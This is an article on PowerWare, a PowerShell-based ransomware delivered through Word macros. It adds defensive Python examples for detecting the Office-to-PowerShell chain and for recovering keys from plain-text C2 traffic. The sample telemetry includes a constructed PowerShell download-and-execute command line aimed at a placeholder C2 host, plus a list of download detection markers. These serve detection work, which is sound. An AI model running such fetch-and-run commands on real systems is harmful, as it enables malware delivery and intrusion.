Cybercriminals Are Using Microsoft PowerShell to Create Ransomware

Cybercriminals are now targeting healthcare firms, enterprises and even hospitals with a strain of ransomware built on PowerShell, Microsoft's scripting language for system administration.

Researchers at security firm Carbon Black have discovered a strain of ransomware, written in Microsoft's PowerShell scripting language, that targeted a healthcare organization. In that case the phishing email that carried the ransomware was unsuccessful.

Dubbed 'PowerWare' by the researchers, the newly discovered strain reaches its victims as a macro-enabled Microsoft Word document.

Using PowerShell both to fetch and to execute the malicious code means the ransomware never has to write a new file to disk. Instead it blends in with legitimate operating-system activity, which makes it harder to detect.

Ransomware is an ever-increasing menace, but conventional variants install malicious files on the system, which makes them comparatively easy to detect; PowerWare's file-less approach removes that clue.

While the code itself is simple, the researchers found that PowerWare takes a novel approach to ransomware.

The researchers found that PowerWare is delivered through a macro-enabled Microsoft Word document whose macro launches two instances of PowerShell.

In what attests to the theory that malware authors are thinking outside the box to make their products harder to detect and kill, one of the two instances downloads the ransomware script; the other takes that script as its input and runs the malicious code to encrypt files on the targeted system. From there the strain behaves like any other ransomware, demanding a ransom payment in return for the decryption key that releases the files.
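The delivery chain described above (Office document, macro, two PowerShell instances, one of them fetching remote content) is something endpoint telemetry can flag. The following detection logic is an added example, not code from the article or from Carbon Black: it runs over process-creation events of a constructed shape (pid, ppid, image, command line) and reports an Office process spawning PowerShell, an Office process launching more than one PowerShell instance, and a PowerShell command line containing generic download indicators. The event records, command lines and URL placeholder are all constructed for the demonstration.

```python
"""Flag a PowerWare-style Office -> PowerShell delivery chain in process-creation
events. Added example: the event format and every sample value are constructed,
not taken from Carbon Black's report."""
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Generic indicators that a PowerShell command line fetches remote content.
# Assumption: these are common fetch-and-run idioms, not PowerWare-specific strings.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_powershell_chain(events):
    """events: list of dicts with keys pid, ppid, image, cmdline (constructed shape).
    Returns a list of (pid, reason) findings, one tuple per matched rule."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        parent_img = basename(parent["image"]) if parent else ""

        # Rule 1: PowerShell started directly by an Office application.
        if parent_img in OFFICE_APPS:
            findings.append((e["pid"], f"PowerShell spawned by Office process {parent_img}"))
            # Rule 2: the same Office process launched several PowerShell instances.
            # Reported once, on the lowest-pid sibling, so the finding is not duplicated.
            siblings = [c for c in children[e["ppid"]] if basename(c["image"]) == "powershell.exe"]
            if len(siblings) >= 2 and e["pid"] == min(s["pid"] for s in siblings):
                findings.append((e["ppid"], f"{parent_img} launched {len(siblings)} PowerShell instances"))

        # Rule 3: the command line itself pulls content from the network.
        cmdline = e["cmdline"].lower()
        if any(marker in cmdline for marker in DOWNLOAD_MARKERS):
            findings.append((e["pid"], "PowerShell command line fetches remote content"))
    return findings


# Constructed sample telemetry: one malicious chain (pids 200/301/302) and one
# benign administrative PowerShell launched from Explorer (pid 400).
DEMO_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "invoice.docm"'},
    {"pid": 301, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "(New-Object Net.WebClient).DownloadString(\'http://C2-PLACEHOLDER/s\')"'},
    {"pid": 302, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, reason in detect_powershell_chain(DEMO_EVENTS):
        print(f"pid {pid}: {reason}")
```

Run against the constructed events, the benign backup script from Explorer produces no finding, while the Word-spawned pair yields four: both instances are flagged for their Office parent, the parent is flagged once for launching two instances, and the first instance is flagged for its download command line. In a real deployment the same three rules map directly onto Sysmon event ID 1 or EDR process-start records.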

In this case, PowerWare initially demands a ransom of $500. If it goes unpaid after two weeks, the ransom demand increases to $1000.

Researchers from Carbon Black also revealed that organizations with full packet capture in place would be able to recover the encryption keys.

They also found that PowerWare contacts its command and control servers over a plain-text protocol, so the traffic can be observed easily.

An organization would then only have to identify the right domain and IP range in its network traffic to retrieve the encryption key, which makes recovery considerably simpler.
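To show what that recovery step looks like in practice, here is an added example (not code from the article or from Carbon Black) that filters parsed plain-text flows by a known C2 domain or IP range and pulls a key field out of the request body. The flow records, the C2 domain, the address ranges and the name of the key field are all constructed: the article does not describe PowerWare's actual request format, so the parser assumes a URL-encoded body as a stand-in.

```python
"""Recover key material from plain-text C2 traffic already captured on the wire.
Added example: flow shape, C2 names/addresses and the 'key' field are constructed."""
import ipaddress
from urllib.parse import parse_qs


def extract_c2_keys(flows, c2_domain, c2_ranges, key_field="key"):
    """flows: list of dicts {src, dst, host, body} (constructed shape, one per request).
    c2_domain: Host header value identified as the C2; c2_ranges: CIDR strings.
    Returns {source_ip: key} for every plain-text request to the C2 that carried
    the key field, so each affected host maps to the key it sent."""
    nets = [ipaddress.ip_network(r) for r in c2_ranges]
    keys = {}
    for f in flows:
        dst = ipaddress.ip_address(f["dst"])
        # Match either on the Host header or on the destination address range;
        # a request with no Host header can still be tied to the C2 by its IP.
        if f.get("host") != c2_domain and not any(dst in n for n in nets):
            continue
        fields = parse_qs(f["body"])
        if key_field in fields:
            keys[f["src"]] = fields[key_field][0]
    return keys


# Constructed flows. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
DEMO_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.7", "host": "c2.example.invalid",
     "body": "id=WS01&key=A1B2C3D4E5F6"},
    # Benign traffic that happens to carry a 'key' field: wrong host and out of range.
    {"src": "10.0.0.5", "dst": "198.51.100.5", "host": "updates.example.invalid",
     "body": "key=NOTRANSOMWARE"},
    # Same C2 range, no Host header: matched by destination address alone.
    {"src": "10.0.0.6", "dst": "203.0.113.9", "host": None,
     "body": "id=WS02&key=F6E5D4C3B2A1"},
]

if __name__ == "__main__":
    for src, key in extract_c2_keys(DEMO_FLOWS, "c2.example.invalid", ["203.0.113.0/24"]).items():
        print(f"{src} sent key {key}")
```

The two matching rules matter because responders often only know one of the two facts at first: a domain from DNS logs, or an address block from firewall logs. Feeding the output into the decryption tooling is then a per-host lookup, which is the simplification the researchers point to.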
